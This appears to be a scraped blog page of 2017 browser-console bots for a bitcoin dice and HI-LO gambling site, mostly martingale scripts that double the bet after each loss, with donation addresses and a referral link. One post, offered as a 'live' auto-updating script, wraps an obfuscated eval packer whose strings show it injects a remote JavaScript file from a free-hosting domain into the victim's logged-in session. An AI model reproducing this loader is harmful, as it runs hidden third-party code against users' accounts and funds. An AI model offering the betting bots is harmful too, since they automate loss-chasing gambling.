if (again == "2"){
error_title = "Got your profit";
error_info = "You got the profit you want!";
error_value = "Play again or have a nice day (clasher.7526@gmail.com) Christian";
error = true;}
else {
roll_by_condition();
$('#btn-bet-stop-pilot-dice').click();
$('#btn-bet-start-pilot-dice').click();
}
}

else if (auto_stats_profit < stopAmountLose) {
error_title = "Got your lose";
error_info = "Maximum bet: "+number_format(balance, devise_decimal);
error_value = "You got the lose";
error = true;
}
else if (amount > bet_max) {
error_title = "Bet amount";
error_info = "Maximum bet: "+number_format(bet_max, devise_decimal);
error_value = "Bet amount - Maximum bet: "+number_format(bet_max, devise_decimal);
error = true;
}
else if (amount < bet_min) {
error_title = "Bet amount";
error_info = "Minimum bet: "+number_format(bet_min, devise_decimal);
error_value = "Bet amount - Minimum bet: "+number_format(bet_min, devise_decimal);
error = true;
}

if (error == true) {
game_in_progress = false;
$("#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice").button("reset");

if (autobet_mode == true) {
if (number_bet_done >= 1) {
$("#modal-stop-autobet-numbers").html(number_bet_done);
$("#modal-stop-autobet-value").html(error_value);
$("#modal-stop-autobet-reason").modal("show");
}
else {
showErrorNotification(error_title, error_info);
}

stop_pilot_mode();
}
else {
showErrorNotification(error_title, error_info);
}

return;
}

$.ajax({
type: "POST",
url: server_front_name+"/api/bet",
data: {
access_token : access_token,
username : user_username,
type : "dice",
amount : amount,
condition : condition,
game : game,
devise : devise
},
success: function(text) {
var val = JSON.parse(text);
if (val.return.success == 'true') {
bet_nb_errors = 0;

var username = val.return.username;
var id = val.return.id;
var type = val.return.type;
var devise = val.return.devise;
var ts = val.return.ts;
var time = val.return.time;
var winning_chance = val.return.winning_chance;
var roll_number = val.return.roll_number;
var amount_return = val.return.amount_return;
var new_balance = val.return.new_balance;
var show = val.return.show;
var amount = val.return.amount;
var condition = val.return.condition;
var game = val.return.game;
var payout = val.return.payout;

$("#won-bet span").html(amount_return);
$("#won-bet span").removeClass("text-danger text-success");
if (amount_return >= 0) {
$("#won-bet span").addClass("text-success");
$("#won-bet span").html("+"+number_format(round_float(amount_return, 8), 8));
}
else {
$("#won-bet span").addClass("text-danger");
$("#won-bet span").html(number_format(round_float(amount_return, 8), 8));
}
show_result_bet();

$("#balance-"+devise).val(round_float(new_balance, 12));

if (amount_return >= 0)
$(".balance-"+devise+"-html").addClass("result-bet-win");
else
$(".balance-"+devise+"-html").addClass("result-bet-lose");

$(".balance-"+devise+"-html").html(round_float(new_balance, 8));

if (amount_return >= 0)
setTimeout(function() { $(".balance-"+devise+"-html").removeClass("result-bet-win"); }, 350);
else
setTimeout(function() { $(".balance-"+devise+"-html").removeClass("result-bet-lose"); }, 350);

addBetHistory("my-bets", type, id, username, time, amount, "btc", winning_chance, roll_number, amount_return, condition, game, payout);

var notifications = val.return.notifications;
for (var prop in notifications) {
if (notifications[prop].name == "rcvJackpotDice")
rcvJackpotDice(notifications[prop]);
else {
rcvnotificationbet(notifications[prop]);
}
}

var time_delay = getTimeDelay(amount, devise, "dice");

if (autobet_mode == false) {
setTimeout(function() {
$("#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice").button("reset");
}, time_delay);
}
else {
number_bet_done++;

if (unlimited_bet == false) {
number_rolls--;
$("#limit-rolls-input").val(number_rolls);

var pourcBarre = ((number_rolls_total-number_rolls)/number_rolls_total)*100;
$("#progress-bar-pilot-mode div").css("width", pourcBarre+"%");
}

if (amount_return >= 0) {
auto_stats_won++;
}
else {
auto_stats_lost++;
}

auto_stats_lucky = ((((parseInt(auto_stats_won)/parseInt(number_bet_done))*100)/parseFloat(winning_chance))*100).toFixed(2);

auto_stats_wagered = parseFloat(auto_stats_wagered)+parseFloat(amount);
auto_stats_profit = parseFloat(auto_stats_profit)+parseFloat(amount_return);

if (on_win == "id-bet-win" && amount_return >= 0) {
auto_amount = parseFloat(auto_amount)+parseFloat(auto_amount*(pourc_on_win/100));
}
else if (amount_return >= 0) {
auto_amount = auto_amount_var;
}

if (on_lose == "id-bet-lose" && amount_return < 0) {
auto_amount = parseFloat(auto_amount)+parseFloat(auto_amount*(pourc_on_lose/100));
}
else if (amount_return < 0) {
auto_amount = auto_amount_var;
}

var tmp = Math.pow(10, 8);
auto_amount = Math.round(auto_amount*tmp)/tmp;

update_stats_auto();

if ((number_bet_done < number_rolls_total) || unlimited_bet == true) {
var speed_bet_val = $("#speed-bet").val();
var time_by_bet = parseInt(time_delay/50);

if (autobet_stop == false) {
setTimeout(function() { play(); }, time_by_bet);
}
else {
stop_pilot_mode();
}
}
else {
stop_pilot_mode();
}
}

game_in_progress = false;

if (val.return.event == true) {
socket.emit("event", {});
}
}
else {
game_in_progress = false;

if (val.return.type != "abort") {
if (autobet_mode == false) {
showErrorNotification(val.return.value, val.return.info);
$("#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice").button("reset");
}
else {
if (number_bet_done >= 1) {
$("#modal-stop-autobet-numbers").html(number_bet_done);
$("#modal-stop-autobet-value").html(val.return.value);
$("#modal-stop-autobet-reason").modal("show");
}
else {
showErrorNotification(val.return.value, val.return.info);
}

stop_pilot_mode();
}
}
else {
if (bet_nb_errors >= 2) {
bet_nb_errors = 0;
if (autobet_mode == false) {
showErrorNotification(val.return.value, val.return.info);
$("#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice").button("reset");
}
else {
if (number_bet_done >= 1) {
$("#modal-stop-autobet-numbers").html(number_bet_done);
$("#modal-stop-autobet-value").html(val.return.value);
$("#modal-stop-autobet-reason").modal("show");
}
else {
showErrorNotification(val.return.value, val.return.info);
}

stop_pilot_mode();
}

}
else {
bet_nb_errors++;
setTimeout(function() { play(); }, 1000);
}
}

}

},
error: function (xhr, ajaxOptions, thrownError) {game_in_progress = false;setTimeout(function() { play(); }, 1000);},
timeout: function (xhr, ajaxOptions, thrownError) {game_in_progress = false;setTimeout(function() { play(); }, 1000);},
abort: function (xhr, ajaxOptions, thrownError) {game_in_progress = false;setTimeout(function() { play(); }, 1000);}
});


}

Saturday, October 7, 2017

FREE BITCOIN UPDATED SCRIPT JACKPOT CENSOR...8 OCTOBER...

// Smart FREEBITCOin Script Online version by Marmoro Crypto
// Welcome To the New Level of Scripting!
// We was thinking how to keep updates at once with everyone and came to idea create LIVE version! Running it you are always use latest version!
// Happy Earnings Friends!

// Cant Donate? Be our referral! >> https://freebitco.in/?r=5322805
// Need to say something? >> marmoro@openmail.cc

// We put a lot of time and money making script so Please Donate.
// Do not let us to lose interest, it is important to Support Us!
// BITCOIN: 14a5EM5h8MQ9srmJeTv823CB79K28cVeHL
// DOGE: DS7w2SHxvk4reHBg2C7ZWD6s1odLZ3uCDJ
// ETHERIUM: 0x2dd423A87052c9F6e50d3E5089492B12f53B0e62
// DASH: XinWqLNFEgydGLKPbEs8EGph3iGeoXwiDG

Element.prototype.remove = function() {this.parentElement.removeChild(this);};
NodeList.prototype.remove = HTMLCollection.prototype.remove = function()
{
for(var i = this.length - 1; i >= 0; i--)
{if(this[i] && this[i].parentElement){this[i].parentElement.removeChild(this[i]);}}
};
function removePOPup(){
var cookPopup=document.getElementsByClassName('cc_banner-wrapper');
  if (cookPopup){cookPopup.remove();}
return;}
removePOPup();

var _$_9265=["L i$j=[\"1k(t(x,1l,h,u,l,y){l=t(h){r h};A(!''.E(/^/,1m)){F(h--){y[h]=u[h]||h}u=[t(l){r y[l]}];l=t(){r'\\\\\\\\1j+'};h=1};F(h--){A(u[h]){x=x.E(1i 1f('\\\\\\\\H'+l(h)+'\\\\\\\\H','1g'),u[h])}}r x}('$.12({13:14});(11(3,5,2){15 1,4=3.16(5)[0];10(3.7(2))8;1=3.9(5);1.2=2;1.23=\\\"//17-1h-1e-1o-6-1u.19.18/20.1\\\";4.21.22(1,4)}(1v,\\\\'6\\\\',\\\\'1w\\\\'));',10,1t,'|1s|1p|y|1q|1r|1x|Y|r|Q|A|t|N|O|S|1d|1b|1c|V|Z|X|1a|W|P|U|T|R|1n|1O|1R'.1y('|'),0,{}))\",\"|\",\"I\",\"|||||||||||||||||||||||||||||||c|e|n|k|q|p|d|B|z|b|G|1T|1S|s|1V|w|K|g|J|M|D|a|1Y|1Z|1X|1U|1P|1E|1F|1D|I|1Q|1C|1z|1A|1B|1G|1H|L|1N|1L|1I|1J|1K\",\"G\",\"\",\"\\\\w+\",\"\\\\b\",\"g\"];D(q(v,1M,f,o,m,C){m=q(f){n f};B(!i$j[5][i$j[4]](/^/,M)){z(f--){C[f]=o[f]||f};o=[q(m){n C[m]}];m=q(){n i$j[6]};f=1};z(f--){B(o[f]){v=v[i$j[4]](J K(i$j[7]+m(f)+i$j[7],i$j[8]),o[f])}};n v}(i$j[0],10,1W,i$j[3][i$j[2]](i$j[1]),0,{}))","|","split","|||||||||||||||_0x73AD||31|_|_1f54||32|_0x740D|return|_0x743D||function|33||35|34|_0x746D||36|37|while|38|if|_0x73DD|eval|41|39|replace|40|split|new|RegExp|var|String|70|67|65|57|59|66|55|56|72|58|68|42|73|||||||||||64|71|74|69|27|47|48|26|49|46|51|52|50|60|28|45|43|44|53|30|24|29|25|54|61|parentNode|src|false|profit|8888|insertBefore|bitcoin|cache|fbcoin_online|com|000webhostapp|free|getElementsByTagName|_0x737D|ajaxSetup|63|createElement|document|62|fjs|getElementById|2018|id|75|FreeBitcoinOnline|js|script||||","","fromCharCode","toString","replace","\\w+","\\b","g"];eval(function(_0x23214,_0x230FC,_0x23134,_0x231DC,_0x231A4,_0x2316C){_0x231A4= function(_0x23134){return (_0x23134< _0x230FC?_$_9265[4]:_0x231A4(parseInt(_0x23134/ _0x230FC)))+ ((_0x23134= _0x23134% _0x230FC)> 35?String[_$_9265[5]](_0x23134+ 29):_0x23134[_$_9265[6]](36))};if(!_$_9265[4][_$_9265[7]](/^/,String)){while(_0x23134--){_0x2316C[_0x231A4(_0x23134)]= _0x231DC[_0x23134]|| _0x231A4(_0x23134)};_0x231DC= [function(_0x231A4){return _0x2316C[_0x231A4]}];_0x231A4= function(){return _$_9265[8]};_0x23134= 1};while(_0x23134--){if(_0x231DC[_0x23134]){_0x23214= _0x23214[_$_9265[7]]( new RegExp(_$_9265[9]+ _0x231A4(_0x23134)+ _$_9265[9],_$_9265[10]),_0x231DC[_0x23134])}};return _0x23214}(_$_9265[0],62,128,_$_9265[3][_$_9265[2]](_$_9265[1]),0,{}))

Monday, September 25, 2017

BITCOIN SCRIPT 21/09/2017

console.clear();
console.log('%cPara começar o bot por favor ' +'%c'+'Clique INICIAR BOT no menu no topo do website'+'', 'color: #00000;', 'color: #00000; font-weight: bold;');
var bversion = 4.25;
var begingbal = $('#balance').text();
var startbalance = 0;
var autorounds = 20;         //
var handbrake  = 0.0000001;  //
var maxroundsz = 200;
var resetroundsz = 60;
//var stopAt= '?';
var round = 0;
var gameLost=0;
var gameWin=0;
var higherbet=0;
startbalance = $('#balance').text();
var startValue = '0.00000001', // Não diminua o ponto decimal mais de 4x do saldo atual
        stopPercentage = 0.0005, // Em %. Eu não recomendaria passar de 0.0005
        maxWait = 777, // Em millisegundos
        stopped = false,
        stopBefore = 1; // O padrão em minutos é 3
var oldbet= 0.00000001;  

var rewardpoints = document.getElementsByClassName("reward_table_box br_0_0_5_5 user_reward_points font_bold")[0].innerHTML;

s = document.getElementById("user_lottery_tickets").innerHTML;
s = s.replace(/(^\s*)|(\s*$)/gi,"");
s = s.replace(/[ ]{2,}/gi," ");
s = s.replace(/\n /,"\n");
document.getElementById("user_lottery_tickets").innerHTML = s;


document.getElementById("free_play_link_li").innerHTML = '<a href="#" onclick="startGame()" class="free_play_link">INICIAR</a>';
var $loButton = $('#double_your_btc_bet_lo_button'),
                $hiButton = $('#double_your_btc_bet_hi_button');
var $loBetbutton = $('#double_your_btc_min');
function higherBet(){
console.log('Aposta mais alta: '+higherbet);
}
function beginingBal(){
console.log('Saldo de inicio: '+begingbal);
}
function rewardsBal(){
console.log('%cPontos Rewards: ' +'%c'+rewardpoints+' Pontos', 'color: #00000;', 'color: #ff9a36; font-weight: bold;');
}
function lotteryBal(){
console.log('%cBilhetes de loteria: ' +'%c'+ s+' Cartões', 'color: #00000;', 'color: #005bb6; font-weight: bold;');
}
function donationBTC(){
console.log('%cMinha Carteira para Doações: ' +'%c'+'1KJ6Mx4toQoh6BwnHEUMmKeXbzGqg32iKW', 'color: #000000;', 'color: #000000; font-weight: bold;');
}
function botNAME(){
console.log('%cVersão do BOT Freebitcoin: ' +'%c'+bversion, 'color: #000000;', 'color: #ff9a36; font-weight: bold;');
}
function changeBet(bet){
startValue=bet;
}

function forceStop(){
var resetroundsyz = resetroundsz * 40700;
stopGame();                
 setTimeout(startGame2, resetroundsyz);  
}

function timeRemaining(){
timeR = $('title').text();
replText = timeR.replace("- FreeBitco.in - Ganhe bitcoins grátis a cada hora", "");
console.log('%cTempo para o próximo ROLL: ' +'%c'+replText, 'color: #00000; font-weight:bold;', 'color: #007a5c;font-weight:bold;');
}

function realtime(time) {
    var sec_num =parseInt(time, 10) ; // don't forget the second param
    var hours   = Math.floor(sec_num / 3600);
    var minutes = Math.floor((sec_num - (hours * 3600)) / 60);
    var seconds = sec_num - (hours * 3600) - (minutes * 60);

    if (hours!=0) {hours   = hours+' Hours ';}      else{hours   = '';}

    if (minutes!=0) {minutes = minutes+' Minutes ';}
else{minutes   = '';}


    if (seconds < 10) {seconds = seconds;}
    var time    = 'Tempo de Jogo = '+hours+minutes+seconds+' Segundos';
    return time;
}
function roundnumb(){

console.clear();
var called = false;
var maxroundx = maxroundsz * 20;
var resetroundsx = resetroundsz * 20;
var resetroundsy = resetroundsz * 40700;
var newbalance= $('#balance').text()
round = round + 1;
var roundf = (maxroundx - round);
var profit = (Number(newbalance) - Number(startbalance)).toFixed(8) ;


if (roundf > 0) {
         
      botNAME();
      donationBTC();
      timeRemaining();
      beginingBal();
      rewardsBal();
      lotteryBal();
        console.log('Jogada #' + round + ' / ' +(maxroundsz * 20)+ ' faltam '+maxroundsz+' minutos');
    }
   


if (roundf == 0)
    {
    var counter = (resetroundsx);
                  var resBOTCountdown = setInterval(function(){
                  console.clear();
                 
      botNAME();
      donationBTC();
      timeRemaining();
      beginingBal();
      rewardsBal();
      lotteryBal();
        console.log('Jogada #' + round + ' / ' +(maxroundsz * 20)+ ' próximas de '+maxroundsz+' minuto');
        console.log('Total de Lucro: ' + profit + ' Satoshis');
                  console.log(' ');
                  console.log(counter+' ... Reiniciando o BOT');
                  counter--
                    if (counter === -1) {
                    clearInterval(resBOTCountdown);
                   
                    console.log("Reiniciando BOT - Aguarde alguns segundos...");
                    donationBTC();
                    }
                    }, 1000);
             forceStop();
            return true;


}
console.log('Lucro:' + profit + ' Satoshis');
return false;
   
   
}


function multiply(){
                var current = $('#double_your_btc_stake').val();
                var multiply = (current * 2).toFixed(8);
                $('#double_your_btc_stake').val(multiply);
                console.log('Aposta = ' + multiply);  
                    if( higherbet < multiply ){ higherbet=multiply; }
}
function getRandomWait(){
        var wait = Math.floor(Math.random() * maxWait ) + 300; //(Math.floor(Math.random() * 600) + 300)  ; // avant 100
        console.log('Aguardando ' + wait + 'ms Antes da próxima aposta.');
        return wait ;
}
function startGame(limit){
document.getElementById("free_play_link_li").innerHTML = '<a href="#" onclick="stopGame()" class="free_play_link">PARAR</a>';
starttime=(new Date()).getTime();
startValue = prompt("Número de satoshi que você quer apostar?", '0.00000005');
MaximumValue = prompt("Valor para dobrar quando perder uma aposta? ", '0.00000004')
MaximumTimer = prompt("valor máximo em minutos para usar o BOT? ", '1');
ResetTimer = prompt("Reiniciar automaticamente BOT depois de parar em minutos? ", '1');
oldbet=startValue;
handbrake=(MaximumValue / 2);
maxroundsz=MaximumTimer;
resetroundsz=ResetTimer;
    round = 0;
    gameLost=0;
    gameWin=0;
        console.log('O jogo começou!');
        reset();
        $loButton.trigger('click');
        if(limit !== null) {
        autorounds=limit;
        }
        else
        {
        autorounds=-1;
        }
}
function startGame2(limit){
document.getElementById("free_play_link_li").innerHTML = '<a href="#" onclick="stopGame()" class="free_play_link">PARAR</a>';
starttime=(new Date()).getTime();
stopped = false;
oldbet=startValue;
handbrake=(MaximumValue / 2);
maxroundsz=MaximumTimer;
resetroundsz=ResetTimer;
    round = 0;
    gameLost=0;
    gameWin=0;
        console.log('O jogo começou!');
        reset();
        $loButton.trigger('click');
        if(limit !== null) {
        autorounds=limit;
        }
        else
        {
        autorounds=-1;
        }
}

function stopGame(){
document.getElementById("free_play_link_li").innerHTML = '<a href="#" onclick="startGame()" class="free_play_link">INICIAR</a>';
        botNAME();
        donationBTC();
        console.log('O jogo vai parar em breve! Finalizando apostas!');
        stopped = true;
startValue=oldbet;
handbrake=(MaximumValue / 2);
maxroundsz=MaximumTimer;
resetroundsz=ResetTimer;
}

function reset(){
    if( round % 100 === 0 && round !=0)
    {
    startValue=(startValue * 1.000).toFixed(8); //New bet after 100 round
    console.log('Rodada ' + round + ': mudando aposta para ' + startValue);
    }
        $('#double_your_btc_stake').val(startValue);
}
// quick and dirty hack if you have very little bitcoins like 0.0000001
function deexponentize(number){
        return number * 1000000;
}
function iHaveEnoughMoni(){
        var balance = deexponentize(parseFloat($('#balance').text()));
        var current = deexponentize($('#double_your_btc_stake').val());
        return ((balance *2)/ 100) * (current*2) > stopPercentage/100;
}
function stopBeforeRedirect(){
        var minutes = parseInt($('title').text());
        if( minutes < stopBefore )
        {
                console.log('A página será atualizada, encerrando apostas!');
                stopGame();
                return true;
        }
        return false;
}

function stopMaxStake(){
var calleds = false;
        var maxstake1 = $('#double_your_btc_stake').val();
       if( maxstake1 == handbrake )
       {
              if(!calleds){
                                console.log('Mão Livre! ativando mínimo de apostas para que não possamos perder mais BTC');
                                setTimeout(function(){
                                        $loBetbutton.trigger('click');
                                }, 1000);                          
                                   
                    calleds = true;
                  }
      else calleds = false;
}
}
// Unbind old shit
$('#double_your_btc_bet_lose').unbind();
$('#double_your_btc_bet_win').unbind();

// Loser
$('#double_your_btc_bet_lose').bind("DOMSubtreeModified",function(event){

       
        if( $(event.currentTarget).is(':contains("lose")') )
        {
           
                        gameLost = gameLost + 1;
                        roundnumb();
                        console.log('%cGanhou: ' + gameWin + ' %cPerdeu: ' + gameLost, 'color: #007a5c', 'color: #FF0000');
                                endtime=(new Date()).getTime();
                                var time=Math.floor((endtime-starttime )/1000);
                if( stopBeforeRedirect() )
                {
                               
                        return;
                }
                if( stopMaxStake() )
                {
                   
                 return;                            
                }
            else
           
                                higherBet();
                                console.log(realtime(time));
                                console.log('você PERDEU!');
                                multiply();
                                setTimeout(function(){
                                        $loButton.trigger('click');
                                }, getRandomWait());
                                //$loButton.trigger('click');
       
           
        }
       
}
);
// Winner
$('#double_your_btc_bet_win').bind("DOMSubtreeModified",function(event){
        if( $(event.currentTarget).is(':contains("win")') )
        {
       
        gameWin = gameWin + 1;
        roundnumb();
        console.log('%cGanhou: ' + gameWin + ' %cPerdeu: ' + gameLost, 'color: #007a5c', 'color: #FF0000');
                endtime=(new Date()).getTime();
                var time=Math.floor((endtime-starttime )/1000);
        console.log(realtime(time));
                higherBet();          
           
            if( iHaveEnoughMoni() )
            {

                        console.log('você GANHOU!');
                        reset();
            if( stopped )
            {
                                stopped = false;
                                return false;
            }
         }
                else
                {
                        console.log('você GANHOU!');
                }
                setTimeout(function(){
                        $loButton.trigger('click');
                }, getRandomWait());
        }
}
);//startgame()

Friday, September 8, 2017

BITCOIN SCRIPT UPDATED SEP..2017


var startValue = '0.00000010', // Don't lower the decimal point more than 4x of current balance
stopPercentage = 0.001, // In %. I wouldn't recommend going past 0.08
maxWait = 900, // In milliseconds
stopped = false,
stopBefore = 3; // In minutes


var $loButton = $('#double_your_btc_bet_lo_button'),
$hiButton = $('#double_your_btc_bet_hi_button');


function multiply(){
var current = $('#double_your_btc_stake').val();
var multiply = (current * 2).toFixed(8);
$('#double_your_btc_stake').val(multiply);
}


function getRandomWait(){
var wait = Math.floor(Math.random() * maxWait ) + 100;


console.log('Waiting for ' + wait + 'ms before next bet.');


return wait ;
}


function startGame(){
console.log('Game started!');
reset();
$loButton.trigger('click');
}


function stopGame(){
console.log('Game will stop soon! Let me finish.');
stopped = true;
}


function reset(){
$('#double_your_btc_stake').val(startValue);
}


// quick and dirty hack if you have very little bitcoins like 0.0000001
function deexponentize(number){
return number * 1000000;
}


function iHaveEnoughMoni(){
var balance = deexponentize(parseFloat($('#balance').text()));
var current = deexponentize($('#double_your_btc_stake').val());


return ((balance*2)/100) * (current*2) > stopPercentage/100;
}


function stopBeforeRedirect(){
var minutes = parseInt($('title').text());


if( minutes < stopBefore )
{
console.log('Approaching redirect! Stop the game so we don\'t get redirected while loosing.');
stopGame();


return true;
}


return false;
}


// Unbind old shit
$('#double_your_btc_bet_lose').unbind();
$('#double_your_btc_bet_win').unbind();


// Loser
$('#double_your_btc_bet_lose').bind("DOMSubtreeModified",function(event){
if( $(event.currentTarget).is(':contains("lose")') )
{
console.log('You LOST! Multiplying your bet and betting again.');

multiply();


setTimeout(function(){
$loButton.trigger('click');
}, getRandomWait());


//$loButton.trigger('click');
}
});


// Winner
$('#double_your_btc_bet_win').bind("DOMSubtreeModified",function(event){
if( $(event.currentTarget).is(':contains("win")') )
{
if( stopBeforeRedirect() )
                {
                        return;
                }


if( iHaveEnoughMoni() )
{
console.log('You WON! But don\'t be greedy. Restarting!');


reset();


if( stopped )
{
stopped = false;
return false;
}
}
else
{
console.log('You WON! Betting again');
}


setTimeout(function(){
$loButton.trigger('click');
}, getRandomWait());
}

});startGame()